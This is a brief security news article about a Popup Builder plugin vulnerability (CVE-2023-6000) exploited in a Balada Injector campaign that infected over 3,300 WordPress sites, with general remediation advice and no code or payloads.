WordPress Plugin Vulnerability Leads To 3,300 Sites Infected With Malware

In a recent cybersecurity development, a significant number of WordPress websites have fallen victim to a widespread malware infection. The culprit is a vulnerability in an outdated version of the Popup Builder plugin, which has been exploited by hackers to compromise over 3,300 sites.

The security flaw, identified as CVE-2023-6000, affects Popup Builder versions 4.2.3 and below. It was initially disclosed in November 2023, but many site administrators failed to update promptly, leading to a large-scale Balada Injector campaign that infected thousands of websites.

Attackers have been injecting malicious code into the Custom JavaScript or CSS sections of the WordPress admin interface, specifically targeting event handlers related to the Popup Builder plugin. This code triggers upon certain actions, such as opening or closing a popup, and primarily aims to redirect visitors to harmful sites, including phishing pages and malware-dropping domains.

Preventive Measures and Remediation - Website owners are advised to upgrade to the latest version of the Popup Builder plugin, which patches the vulnerability and other security issues. Additionally, blocking the domains associated with the attack can help prevent further infections. For those already affected, thorough removal of the malicious entries and scanning for hidden backdoors are crucial steps to secure their sites.

‍